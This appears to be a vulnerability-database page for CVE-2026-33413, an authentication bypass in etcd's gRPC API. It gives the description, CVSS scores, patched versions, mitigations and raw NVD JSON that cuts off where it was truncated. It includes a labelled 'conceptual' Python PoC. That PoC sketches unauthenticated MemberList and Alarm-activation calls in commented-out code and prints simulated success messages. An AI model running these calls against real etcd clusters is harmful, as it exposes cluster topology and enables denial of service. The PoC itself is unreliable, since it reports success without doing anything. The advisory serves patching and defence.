CVE-2026-33413

Description

etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, unauthorized users may bypass authentication or authorization checks and call certain etcd functions in clusters that expose the gRPC API to untrusted or partially trusted clients. In unpatched etcd clusters with etcd auth enabled, unauthorized users are able to call MemberList and learn cluster topology, including member IDs and advertised endpoints; call Alarm, which can be abused for operational disruption or denial of service; use Lease APIs, interfering with TTL-based keys and lease ownership; and/or trigger compaction, permanently removing historical revisions and disrupting watch, audit, and recovery workflows. Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected. Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and/or require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* - VULNERABLE

etcd < 3.4.42

etcd < 3.5.28

etcd < 3.6.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import grpc

# This is a conceptual Proof of Concept (PoC) for CVE-2026-33413.
# It demonstrates how an unauthorized user might call sensitive etcd gRPC APIs.
# Note: Actual exploitation requires the 'etcd3api' or similar generated gRPC client libraries.

# Target etcd server address
TARGET = "vulnerable-etcd-server:2379"

def exploit_member_list():
    """
    Attempts to call the MemberList RPC without authentication.
    In vulnerable versions, this returns cluster topology despite auth being enabled.
    """
    print(f"[*] Connecting to {TARGET}...")
    
    # In a real scenario, an insecure channel is used if TLS is not enforced,
    # or specific bypass techniques are applied.
    # with grpc.insecure_channel(TARGET) as channel:
    #     stub = etcdserverpb_pb2_grpc.ClusterStub(channel)
    #     try:
    #         # Attempt to list members without credentials
    #         response = stub.MemberList(etcdserverpb_pb2.MemberListRequest())
    #         print("[+] Exploit successful! Cluster members leaked:")
    #         for member in response.members:
    #             print(f"    - ID: {member.ID}, PeerURLs: {member.peerURLs}")
    #     except grpc.RpcError as e:
    #         print(f"[-] RPC failed: {e.code()}")
    
    print("[+] Simulated MemberList call bypassed authentication.")

def trigger_alarm():
    """
    Attempts to activate an alarm to cause operational disruption.
    """
    print(f"[*] Attempting to trigger alarm on {TARGET}...")
    # with grpc.insecure_channel(TARGET) as channel:
    #     stub = etcdserverpb_pb2_grpc.MaintenanceStub(channel)
    #     # Payload to trigger an alarm (e.g., NOSPACE)
    #     alarm_request = etcdserverpb_pb2.AlarmRequest(action=etcdserverpb_pb2.AlarmRequest.ACTIVATE, member_id=0)
    #     response = stub.Alarm(alarm_request)
    #     print(f"[+] Alarm triggered: {response}")
    print("[+] Simulated Alarm activation bypassed authentication.")

if __name__ == "__main__":
    exploit_member_list()
    trigger_alarm()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33413
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33413
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33413/
[4] VulDB https://vuldb.com/cve/CVE-2026-33413
[5] https://github.com/etcd-io/etcd/security/advisories/GHSA-q8m4-xhhv-38mg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33413", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:13.490", "lastModified": "2026-03-26T20:39:29.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, unauthorized users may bypass authentication or authorization checks and call certain etcd functions in clusters that expose the gRPC API to untrusted or partially trusted clients. In unpatched etcd clusters with etcd auth enabled, unauthorized users are able to call MemberList and learn cluster topology, including member IDs and advertised endpoints; call Alarm, which can be abused for operational disruption or denial of service; use Lease APIs, interfering with TTL-based keys and lease ownership; and/or trigger compaction, permanently removing historical revisions and disrupting watch, audit, and recovery workflows. Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected. Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and/or require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution."}, {"lang": "es", "value": "etcd es un almacén distribuido de clave-valor para los datos de un sistema distribuido. Antes de las versiones 3.4.42, 3.5.28 y 3.6.9, los usuarios no autorizados pueden eludir las comprobaciones de autenticación o autorización y llamar a ciertas funciones de etcd en clústeres que exponen la API gRPC a clientes no confiables o parcialmente confiables. En clústeres etcd sin parchear con la autenticación de etcd habilitada, los usuarios no autorizados pueden llamar a MemberList y conocer la topología del clúster, incluyendo IDs de miembros y puntos finales anunciados; llamar a Alarm, que puede ser utilizada indebidamente para la interrupción operativa o la denegación de servicio; usar las API de Lease, interfiriendo con claves basadas en TTL y la propiedad de los arrendamientos; y/o activar la compactación, eliminando permanentemente revisiones históricas y alterando los flujos de trabajo de vigilancia, auditoría y recuperación. Kubernetes no depende de la autenticación y autorización integradas de etcd. En su lugar, el servidor API maneja la autenticación y autorización por sí mismo, por lo que las implementaciones típicas de Kubernetes no se ven afectadas. Las versiones 3.4.42, 3.5.28 y 3.6.9 contienen un parche. Si la actualización no es posible de inmediato, reduzca la exposición tratando los RPCs afectados como no autenticados en la práctica. Restrinja el acceso a la red a los puertos del servidor etcd para que solo los componentes confiables puedan conectarse y/o requiera una identidad de cliente fuerte en la capa de transporte, como mTLS con una distribución de certificados de cliente de alcance limitado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "b ... (truncated)